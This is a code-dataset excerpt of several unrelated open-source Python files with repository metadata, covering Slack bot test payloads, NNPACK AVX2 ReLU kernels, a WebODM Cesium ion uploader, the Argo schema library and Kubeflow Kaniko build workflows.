"text": ""}
no_arg_bot_with_arg = {"token": "slacktoken123",
"team_id": "team123",
"team_domain": "teamdomain",
"channel_id": "channelid",
"channel_name": "directmes1N8L",
"user_name": "derp",
"command": "/no_arg_bot",
"subcommand": "no_arg_bot",
"args": "arg1",
"text": "arg1"}
optional_arg_bot_with_optional_arg = {"token": "slacktoken123",
"team_id": "team123",
"team_domain": "teamdomain",
"channel_id": "channelid",
"channel_name": "directmes1N8L",
"user_name": "derp",
"command": "/optional_arg_bot",
"subcommand": "optional_arg_bot",
"args": "optional=derp",
"text": "optional=derp"}
optional_arg_bot_with_no_arg = {"token": "slacktoken123",
"team_id": "team123",
"team_domain": "teamdomain",
"channel_id": "channelid",
"channel_name": "directmes1N8L",
"user_name": "derp",
"command": "/optional_arg_bot",
"subcommand": "optional_arg_bot",
"args": "",
"text": ""}
two_message_bot = {"token": "slacktoken123",
"team_id": "team123",
"team_domain": "teamdomain",
"channel_id": "channelid",
"channel_name": "directmes1N8L",
"user_name": "derp",
"command": "/two_message_bot",
"subcommand": "two_message_bot",
"args": "",
"text": ""}
help_subcommand = {"token": "slacktoken123",
"team_id": "team123",
"team_domain": "teamdomain",
"channel_id": "channelid",
"channel_name": "directmes1N8L",
"user_name": "derp",
"command": "/no_arg_bot",
"subcommand": "no_arg_bot",
"args": "",
"text": "help"}
| {
"repo_name": "forter/boten",
"path": "test/payloads.py",
"copies": "1",
"size": "3973",
"license": "apache-2.0",
"hash": 2343321549951832600,
"line_mean": 44.6666666667,
"line_max": 71,
"alpha_frac": 0.3470928769,
"autogenerated": false,
"ratio": 4.5353881278538815,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.5382481004753882,
"avg_score": null,
"num_lines": null
} |
arg_input = Argument(ptr(const_float_), "input")
arg_output = Argument(ptr(float_), "output")
arg_length = Argument(size_t, "length")
arg_negative_slope = Argument(float_, "negative_slope")
with Function("nnp_relu__avx2",
(arg_input, arg_output, arg_length, arg_negative_slope),
target=uarch.default + isa.avx2):
reg_input = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_input, arg_input)
reg_output = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_output, arg_output)
reg_length = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_length, arg_length)
ymm_negative_slope = YMMRegister()
LOAD.ARGUMENT(ymm_negative_slope.as_xmm, arg_negative_slope)
VBROADCASTSS(ymm_negative_slope, ymm_negative_slope.as_xmm)
loop = Loop()
TEST(reg_length, reg_length)
JZ(loop.end)
with loop:
# Load (unaligned!) data and update input pointer
ymm_data = YMMRegister()
VMOVUPS(ymm_data, [reg_input])
ADD(reg_input, YMMRegister.size)
# Scale data with negative slope (for negative inputs)
ymm_scaled_data = YMMRegister()
VMULPS(ymm_scaled_data, ymm_data, ymm_negative_slope)
# Select scaled data if input is negative
VBLENDVPS(ymm_data, ymm_data, ymm_scaled_data, ymm_data)
# Stream (aligned!) data to memory and update output pointer
VMOVNTPS([reg_output], ymm_data)
ADD(reg_output, YMMRegister.size)
SUB(reg_length, YMMRegister.size // float_.size)
JNZ(loop.begin)
RETURN()
arg_data = Argument(ptr(float_), "data")
arg_length = Argument(size_t, "length")
arg_negative_slope = Argument(float_, "negative_slope")
with Function("nnp_inplace_relu__avx2",
(arg_data, arg_length, arg_negative_slope),
target=uarch.default + isa.avx2):
reg_data = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_data, arg_data)
reg_length = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_length, arg_length)
ymm_negative_slope = YMMRegister()
LOAD.ARGUMENT(ymm_negative_slope.as_xmm, arg_negative_slope)
VBROADCASTSS(ymm_negative_slope, ymm_negative_slope.as_xmm)
loop = Loop()
TEST(reg_length, reg_length)
JZ(loop.end)
with loop:
# Load data
ymm_data = YMMRegister()
VMOVAPS(ymm_data, [reg_data])
# Scale data with negative slope (for negative inputs)
ymm_scaled_data = YMMRegister()
VMULPS(ymm_scaled_data, ymm_data, ymm_negative_slope)
# Select scaled data if input is negative
VBLENDVPS(ymm_data, ymm_data, ymm_scaled_data, ymm_data)
# Store data back to the same location and update pointer
VMOVAPS([reg_data], ymm_data)
ADD(reg_data, YMMRegister.size)
SUB(reg_length, YMMRegister.size // float_.size)
JNZ(loop.begin)
RETURN()
arg_output_gradient = Argument(ptr(const_float_), "output_gradient")
arg_input = Argument(ptr(const_float_), "input")
arg_input_gradient = Argument(ptr(float_), "input_gradient")
arg_length = Argument(size_t, "length")
arg_negative_slope = Argument(float_, "negative_slope")
with Function("nnp_grad_relu__avx2",
(arg_output_gradient, arg_input, arg_input_gradient, arg_length, arg_negative_slope),
target=uarch.default + isa.avx2):
reg_output_gradient = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_output_gradient, arg_output_gradient)
reg_input = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_input, arg_input)
reg_input_gradient = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_input_gradient, arg_input_gradient)
reg_length = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_length, arg_length)
ymm_negative_slope = YMMRegister()
LOAD.ARGUMENT(ymm_negative_slope.as_xmm, arg_negative_slope)
VBROADCASTSS(ymm_negative_slope, ymm_negative_slope.as_xmm)
loop = Loop()
TEST(reg_length, reg_length)
JZ(loop.end)
with loop:
# Load (unaligned!) gradient and update output gradient pointer
ymm_gradient = YMMRegister()
VMOVUPS(ymm_gradient, [reg_output_gradient])
ADD(reg_output_gradient, YMMRegister.size)
# Load (unaligned!) data and update input pointer
ymm_data = YMMRegister()
VMOVUPS(ymm_data, [reg_input])
ADD(reg_input, YMMRegister.size)
# Scale gradient with negative slope (for negative inputs)
ymm_scaled_gradient = YMMRegister()
VMULPS(ymm_scaled_gradient, ymm_gradient, ymm_negative_slope)
# Select scaled gradient if input is negative
VBLENDVPS(ymm_gradient, ymm_gradient, ymm_scaled_gradient, ymm_data)
# Stream (aligned!) gradient to memory and update input gradient pointer
VMOVAPS([reg_input_gradient], ymm_gradient)
ADD(reg_input_gradient, YMMRegister.size)
SUB(reg_length, YMMRegister.size // float_.size)
JNZ(loop.begin)
RETURN()
| {
"repo_name": "microblink/NNPACK",
"path": "src/x86_64-fma/relu.py",
"copies": "3",
"size": "4493",
"license": "bsd-2-clause",
"hash": 3945685513883665000,
"line_mean": 29.7739726027,
"line_max": 86,
"alpha_frac": 0.7360338304,
"autogenerated": false,
"ratio": 2.847275031685678,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5083308862085678,
"avg_score": null,
"num_lines": null
} |
# Arg order is very important for task deconstruction.
# If order is changed make sure that the refresh API call is updated
def upload_to_ion(
task_id,
asset_type,
token,
asset_path,
name,
description="",
attribution="",
options={},
):
import sys
import time
import logging
import requests
from os import path
from shutil import rmtree
from enum import Enum
from app.plugins import logger
from .api_views import (
get_asset_info,
set_asset_info,
AssetType,
ASSET_TO_OUTPUT,
ASSET_TO_SOURCE,
ASSET_TO_FILE,
pluck,
)
from .model_tools import (
to_ion_texture_model,
IonInvalidZip,
)
from .globals import ION_API_URL
class LoggerAdapter(logging.LoggerAdapter):
def __init__(self, prefix, logger):
super().__init__(logger, {})
self.prefix = prefix
def process(self, msg, kwargs):
return "[%s] %s" % (self.prefix, msg), kwargs
class TaskUploadProgress(object):
def __init__(self, file_path, task_id, asset_type, logger=None, log_step_size=0.05):
self._task_id = task_id
self._asset_type = asset_type
self._logger = logger
self._uploaded_bytes = 0
self._total_bytes = float(path.getsize(file_path))
self._asset_info = get_asset_info(task_id, asset_type)
self._last_log = 0
self._log_step_size = log_step_size
@property
def asset_info(self):
return self._asset_info
def __call__(self, total_bytes):
self._uploaded_bytes += total_bytes
progress = self._uploaded_bytes / self._total_bytes
if progress == 1:
progress = 1
self._asset_info["upload"]["progress"] = progress
if self._logger is not None and progress - self._last_log > self._log_step_size:
self._logger.info(f"Upload progress: {progress * 100}%")
self._last_log = progress
set_asset_info(self._task_id, self._asset_type, self._asset_info)
asset_logger = LoggerAdapter(prefix=f"Task {task_id} {asset_type}", logger=logger)
asset_type = AssetType[asset_type]
asset_info = get_asset_info(task_id, asset_type)
del_directory = None
try:
import boto3
except ImportError:
import subprocess
asset_logger.info(f"Manually installing boto3...")
subprocess.call([sys.executable, "-m", "pip", "install", "boto3"])
import boto3
try:
# Update asset_path based off
if asset_type == AssetType.TEXTURED_MODEL:
try:
asset_path, del_directory = to_ion_texture_model(asset_path)
logger.info("Created ion texture model!")
except IonInvalidZip as e:
logger.info("Non geo-referenced texture model, using default file.")
except Exception as e:
logger.warning("Failed to convert to ion texture model")
logger.warning(e)
headers = {"Authorization": f"Bearer {token}"}
data = {
"name": name,
"description": description,
"attribution": attribution,
"type": ASSET_TO_OUTPUT[asset_type],
"options": {**options, "sourceType": ASSET_TO_SOURCE[asset_type]},
}
# Create Asset Request
asset_logger.info(f"Creating asset of type {asset_type}")
res = requests.post(f"{ION_API_URL}/assets", json=data, headers=headers)
res.raise_for_status()
ion_info, upload_meta, on_complete = pluck(
res.json(), "assetMetadata", "uploadLocation", "onComplete"
)
ion_id = ion_info["id"]
access_key, secret_key, token, endpoint, bucket, file_prefix = pluck(
upload_meta,
"accessKey",
"secretAccessKey",
"sessionToken",
"endpoint",
"bucket",
"prefix",
)
# Upload
asset_logger.info("Starting upload")
uploat_stats = TaskUploadProgress(asset_path, task_id, asset_type, asset_logger)
key = path.join(file_prefix, ASSET_TO_FILE[asset_type])
boto3.client(
"s3",
endpoint_url=endpoint,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
aws_session_token=token,
).upload_file(asset_path, Bucket=bucket, Key=key, Callback=uploat_stats)
asset_info = uploat_stats.asset_info
asset_info["id"] = ion_id
asset_info["upload"]["active"] = False
asset_info["process"]["active"] = True
set_asset_info(task_id, asset_type, asset_info)
# On Complete Handler
asset_logger.info("Upload complete")
method, url, fields = pluck(on_complete, "method", "url", "fields")
res = requests.request(method, url=url, headers=headers, data=fields)
res.raise_for_status()
# Processing Status Refresh
asset_logger.info("Starting processing")
refresh = True
while refresh:
res = requests.get(f"{ION_API_URL}/assets/{ion_id}", headers=headers)
res.raise_for_status()
state, percent_complete = pluck(res.json(), "status", "percentComplete")
progress = float(percent_complete) / 100
if "ERROR" in state.upper():
asset_info["error"] = f"Processing failed"
asset_logger.info("Processing failed...")
refresh = False
if progress >= 1:
refresh = False
if asset_info["process"]["progress"] != progress:
asset_info["process"]["progress"] = progress
asset_logger.info(f"Processing {percent_complete}% - {state}")
set_asset_info(task_id, asset_type, asset_info)
time.sleep(2)
asset_logger.info("Processing complete")
asset_info["process"]["progress"] = 1
asset_info["process"]["active"] = False
except requests.exceptions.HTTPError as e:
if e.response.status_code == 401:
asset_info["error"] = "Invalid ion token!"
elif e.response.status_code == 404:
asset_info["error"] = "Missing permisssions on ion token!"
else:
asset_info["error"] = str(e)
asset_logger.error(e)
except Exception as e:
asset_info["error"] = str(e)
asset_logger.error(e)
if del_directory != None:
rmtree(del_directory)
set_asset_info(task_id, asset_type, asset_info) | {
"repo_name": "OpenDroneMap/WebODM",
"path": "coreplugins/cesiumion/uploader.py",
"copies": "1",
"size": "6717",
"license": "mpl-2.0",
"hash": 6143638130431106000,
"line_mean": 34.3578947368,
"line_max": 92,
"alpha_frac": 0.5681107637,
"autogenerated": false,
"ratio": 4.026978417266187,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5095089180966187,
"avg_score": null,
"num_lines": null
} |
"""Argo schema primitives."""
import sys
import inspect
from . import types
from . import exceptions
PY2 = sys.version_info[0] == 2
if not PY2:
string_types = (str,)
else:
string_types = (str, unicode)
def _get_context(func, kwargs):
"""Prepare a context for the serialization.
:param func: Function which needs or does not need kwargs.
:param kwargs: Dict with context
:return: Keywords arguments that function can accept.
"""
argspec = inspect.getargspec(func)
if argspec.keywords is not None:
return kwargs
return dict((arg, kwargs[arg]) for arg in argspec.args if arg in kwargs)
class Accessor(object):
"""Object that encapsulates the getter and the setter of the attribute."""
def __init__(self, getter=None, setter=None):
"""Initialize an Accessor object."""
self.getter = getter
self.setter = setter
def get(self, obj, **kwargs):
"""Get an attribute from a value.
:param obj: Object to get the attribute value from.
:return: Value of object's attribute.
"""
assert self.getter is not None, "Getter accessor is not specified."
if callable(self.getter):
return self.getter(obj, **_get_context(self.getter, kwargs))
assert isinstance(self.getter, string_types), "Accessor must be a function or a dot-separated string."
for attr in self.getter.split("."):
if isinstance(obj, dict):
obj = obj[attr]
else:
obj = getattr(obj, attr)
if callable(obj):
return obj()
return obj
def set(self, obj, value):
"""Set value for obj's attribute.
:param obj: Result object or dict to assign the attribute to.
:param value: Value to be assigned.
"""
assert self.setter is not None, "Setter accessor is not specified."
if callable(self.setter):
return self.setter(obj, value)
assert isinstance(self.setter, string_types), "Accessor must be a function or a dot-separated string."
def _set(obj, attr, value):
if isinstance(obj, dict):
obj[attr] = value
else:
setattr(obj, attr, value)
return value
path = self.setter.split(".")
for attr in path[:-1]:
obj = _set(obj, attr, {})
_set(obj, path[-1], value)
def __repr__(self):
"""Accessor representation."""
return "<{0} getter='{1}', setter='{1}'>".format(
self.__class__.__name__,
self.getter,
self.setter,
)
class Attr(object):
"""Schema attribute."""
def __init__(self, attr_type=None, attr=None, required=True, **kwargs):
"""Attribute constructor.
:param attr_type: Type, Schema or constant that does the type conversion of the attribute.
:param attr: Attribute name, dot-separated attribute path or an `Accessor` instance.
:param required: Is attribute required to be present.
"""
self.attr_type = attr_type or types.Type()
self.attr = attr
self.required = required
if "default" in kwargs:
self.default = kwargs["default"]
@property
def compartment(self):
"""The key of the compartment this attribute will be placed into (for example: _links or _embedded)."""
return None
@property
def key(self):
"""The key of the this attribute will be placed into (within it's compartment)."""
return self.name
@property
def accessor(self):
"""Get an attribute's accessor with the getter and the setter.
:return: `Accessor` instance.
"""
if isinstance(self.attr, Accessor):
return self.attr
if callable(self.attr):
return Accessor(getter=self.attr)
attr = self.attr or self.name
return Accessor(getter=attr, setter=attr)
def serialize(self, value, **kwargs):
"""Serialize the attribute of the input data.
Gets the attribute value with accessor and converts it using the
type serialization. Schema will place this serialized value into
corresponding compartment of the HAL structure with the name of the
attribute as a key.
:param value: Value to get the attribute value from.
:return: Serialized attribute value.
"""
if types.Type.is_type(self.attr_type):
try:
value = self.accessor.get(value, **kwargs)
except (AttributeError, KeyError):
if not hasattr(self, "default") and self.required:
raise
value = self.default
return self.attr_type.serialize(value, **_get_context(self.attr_type.serialize, kwargs))
return self.attr_type
def deserialize(self, value):
"""Deserialize the attribute from a HAL structure.
Get the value from the HAL structure from the attribute's compartment
using the attribute's name as a key, convert it using the attribute's
type. Schema will either return it to parent schema or will assign
to the output value if specified using the attribute's accessor setter.
:param value: HAL structure to get the value from.
:return: Deserialized attribute value.
:raises: ValidationError.
"""
compartment = value
if self.compartment is not None:
compartment = value[self.compartment]
try:
value = compartment[self.key]
except KeyError:
if hasattr(self, "default"):
value = self.default
else:
raise
return self.attr_type.deserialize(value)
def __repr__(self):
"""Attribute representation."""
return "<{0} '{1}'>".format(
self.__class__.__name__,
self.name,
)
class _Schema(types.Type):
"""Type for creating schema."""
def __new__(cls, **kwargs):
"""Create schema from keyword arguments."""
schema = type("Schema", (cls, ), {"__doc__": cls.__doc__})
schema.__class_attrs__ = []
schema.__attrs__ = []
for name, attr in kwargs.items():
if not hasattr(attr, "name"):
attr.name = name
schema.__class_attrs__.append(attr)
schema.__attrs__.append(attr)
return schema
@classmethod
def serialize(cls, value, **kwargs):
result = {}
for attr in cls.__attrs__:
compartment = result
if attr.compartment is not None:
compartment = result.setdefault(attr.compartment, {})
try:
compartment[attr.key] = attr.serialize(value, **kwargs)
except (AttributeError, KeyError):
if attr.required:
raise
return result
@classmethod
def deserialize(cls, value, output=None):
"""Deserialize the HAL structure into the output value.
:param value: Dict of already loaded json which will be deserialized by schema attributes.
:param output: If present, the output object will be updated instead of returning the deserialized data.
:returns: Dict of deserialized value for attributes. Where key is name of schema's attribute and value is
deserialized value from value dict.
"""
errors = []
result = {}
for attr in cls.__attrs__:
try:
result[attr.name] = attr.deserialize(value)
except NotImplementedError:
# Links don't support deserialization
continue
except exceptions.ValidationError as e:
e.attr = attr.name
errors.append(e)
except KeyError:
if attr.required:
e = exceptions.ValidationError("Missing attribute.", attr.name)
e.attr = attr.name
errors.append(e)
if errors:
raise exceptions.ValidationError(errors)
if output is None:
return result
for attr in cls.__attrs__:
if attr.name in result:
attr.accessor.set(output, result[attr.name])
class _SchemaType(type):
def __init__(cls, name, bases, clsattrs):
cls.__class_attrs__ = []
cls.__attrs__ = []
# Collect the attributes and set their names.
for name, value in clsattrs.items():
if isinstance(value, Attr):
delattr(cls, name)
cls.__class_attrs__.append(value)
if not hasattr(value, "name"):
value.name = name
for base in reversed(cls.__mro__):
cls.__attrs__.extend(getattr(base, "__class_attrs__", []))
Schema = _SchemaType("Schema", (_Schema, ), {"__doc__": _Schema.__doc__})
| {
"repo_name": "olegpidsadnyi/argo",
"path": "argo/schema.py",
"copies": "1",
"size": "9015",
"license": "mit",
"hash": 4478417798570499600,
"line_mean": 30.8551236749,
"line_max": 113,
"alpha_frac": 0.5759290072,
"autogenerated": false,
"ratio": 4.564556962025317,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00038274752000042674,
"num_lines": 283
} |
""""Argo Workflow base builder for building OCI image using Kaniko"""
from kubeflow.kubeflow import ci
from kubeflow.testing import argo_build_util
class Builder(ci.workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self, dockerfile, context, destination,
second_dockerfile=None, second_destination=None,
mem_override=None, deadline_override=None):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template(mem_override, deadline_override)
# Build component OCI image using Kaniko
dockerfile = ("%s/%s") % (self.src_dir, dockerfile)
context = "dir://%s/%s" % (self.src_dir, context)
destination = destination
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination)
argo_build_util.add_task_to_dag(workflow,
ci.workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
if second_dockerfile and second_destination:
dockerfile = ("%s/%s") % (self.src_dir, second_dockerfile)
destination = second_destination
second_kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination)
argo_build_util.add_task_to_dag(workflow,
ci.workflow_utils.E2E_DAG_NAME,
second_kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/kaniko_builder.py",
"copies": "1",
"size": "2033",
"license": "apache-2.0",
"hash": 7086189228530367000,
"line_mean": 45.2045454545,
"line_max": 83,
"alpha_frac": 0.581406788,
"autogenerated": false,
"ratio": 4.165983606557377,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0017387313388030749,
"num_lines": 44
} |
""""Argo Workflow for building notebook-server-tensorflow-full OCI images using Kaniko"""
from kubeflow.kubeflow.cd import config, kaniko_builder
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = kaniko_builder.Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build(dockerfile="components/example-notebook-servers/jupyter-tensorflow-full/cpu.Dockerfile",
context="components/example-notebook-servers/jupyter-tensorflow-full/",
destination=config.NOTEBOOK_SERVER_JUPYTER_TENSORFLOW_FULL,
second_dockerfile="components/example-notebook-servers/jupyter-tensorflow-full/cuda.Dockerfile",
second_destination=config.NOTEBOOK_SERVER_JUPYTER_TENSORFLOW_CUDA_FULL,
mem_override="8Gi",
deadline_override=6000)
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/notebook_servers/notebook_server_jupyter_tensorflow_full.py",
"copies": "1",
"size": "1074",
"license": "apache-2.0",
"hash": -5141787884058130000,
"line_mean": 55.5263157895,
"line_max": 121,
"alpha_frac": 0.6638733706,
"autogenerated": false,
"ratio": 4.178988326848249,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5342861697448249,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for building notebook-server-tensorflow OCI images using Kaniko"""
from kubeflow.kubeflow.cd import config, kaniko_builder
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = kaniko_builder.Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build(dockerfile="components/example-notebook-servers/jupyter-tensorflow/cpu.Dockerfile",
context="components/example-notebook-servers/jupyter-tensorflow/",
destination=config.NOTEBOOK_SERVER_JUPYTER_TENSORFLOW,
second_dockerfile="components/example-notebook-servers/jupyter-tensorflow/cuda.Dockerfile",
second_destination=config.NOTEBOOK_SERVER_JUPYTER_TENSORFLOW_CUDA,
mem_override="8Gi",
deadline_override=6000)
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/notebook_servers/notebook_server_jupyter_tensorflow.py",
"copies": "1",
"size": "1044",
"license": "apache-2.0",
"hash": -2683801358010652700,
"line_mean": 53.9473684211,
"line_max": 116,
"alpha_frac": 0.6599616858,
"autogenerated": false,
"ratio": 4.261224489795918,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5421186175595918,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for building the notebook-server-jupyter-pytorch-full OCI images using Kaniko"""
from kubeflow.kubeflow.cd import config, kaniko_builder
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = kaniko_builder.Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build(dockerfile="components/example-notebook-servers/jupyter-pytorch-full/cpu.Dockerfile",
context="components/example-notebook-servers/jupyter-pytorch-full/",
destination=config.NOTEBOOK_SERVER_JUPYTER_PYTORCH_FULL,
second_dockerfile="components/example-notebook-servers/jupyter-pytorch-full/cuda.Dockerfile",
second_destination=config.NOTEBOOK_SERVER_JUPYTER_PYTORCH_CUDA_FULL,
mem_override="8Gi",
deadline_override=6000)
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/notebook_servers/notebook_server_jupyter_pytorch_full.py",
"copies": "1",
"size": "1068",
"license": "apache-2.0",
"hash": 8213372280398020000,
"line_mean": 55.2105263158,
"line_max": 118,
"alpha_frac": 0.6601123596,
"autogenerated": false,
"ratio": 3.985074626865672,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5145186986465672,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for building the notebook-server-jupyter-pytorch OCI images using Kaniko"""
from kubeflow.kubeflow.cd import config, kaniko_builder
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = kaniko_builder.Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build(dockerfile="components/example-notebook-servers/jupyter-pytorch/cpu.Dockerfile",
context="components/example-notebook-servers/jupyter-pytorch/",
destination=config.NOTEBOOK_SERVER_JUPYTER_PYTORCH,
second_dockerfile="components/example-notebook-servers/jupyter-pytorch/cuda.Dockerfile",
second_destination=config.NOTEBOOK_SERVER_JUPYTER_PYTORCH_CUDA,
mem_override="8Gi",
deadline_override=6000)
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/notebook_servers/notebook_server_jupyter_pytorch.py",
"copies": "1",
"size": "1038",
"license": "apache-2.0",
"hash": 5149375695415718000,
"line_mean": 53.6315789474,
"line_max": 113,
"alpha_frac": 0.6560693642,
"autogenerated": false,
"ratio": 4.0546875,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.52107568642,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for testing Admission Webhook"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def _kustomize_build_task(self, task_template):
k_build = argo_build_util.deep_copy(task_template)
k_build["name"] = "kustomize-build-test"
k_build["container"]["image"] = "k8s.gcr.io/kustomize/kustomize:v4.1.2"
k_build["container"]["args"] = ["build"]
manifest_dir = ("%s/components/admission-webhook/manifests/"
"overlays/cert-manager/") % self.src_dir
k_build["container"]["workingDir"] = manifest_dir
return k_build
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template()
# build manifests with kustomize
kustomize_build_task = self._kustomize_build_task(task_template)
argo_build_util.add_task_to_dag(workflow, workflow_utils.E2E_DAG_NAME,
kustomize_build_task,
[self.mkdir_task_name])
# Test building Admission Webhook image using Kaniko
dockerfile = ("%s/components/admission-webhook"
"/Dockerfile") % self.src_dir
context = "dir://%s/components/admission-webhook/" % self.src_dir
destination = "admission-webhook-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination,
no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/admission_webhook_tests.py",
"copies": "1",
"size": "2612",
"license": "apache-2.0",
"hash": 5358690045490798000,
"line_mean": 40.4603174603,
"line_max": 79,
"alpha_frac": 0.5872894334,
"autogenerated": false,
"ratio": 3.9635811836115327,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 63
} |
""""Argo Workflow for testing notebook-server-base OCI image"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template()
# Test building notebook-server-base image using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/base/Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/base/" % self.src_dir
destination = "notebook-server-base-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_base_tests.py",
"copies": "1",
"size": "1781",
"license": "apache-2.0",
"hash": -5387063644461100000,
"line_mean": 40.4186046512,
"line_max": 85,
"alpha_frac": 0.6153846154,
"autogenerated": false,
"ratio": 4.094252873563218,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5209637488963218,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for testing notebook-server-codeserver OCI image"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template()
# Test building notebook-server-codeserver image using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/codeserver/Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/codeserver/" % self.src_dir
destination = "notebook-server-codeserver-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_codeserver_tests.py",
"copies": "1",
"size": "1811",
"license": "apache-2.0",
"hash": -6946698984486942000,
"line_mean": 41.1162790698,
"line_max": 91,
"alpha_frac": 0.6217559359,
"autogenerated": false,
"ratio": 4.115909090909091,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5237665026809091,
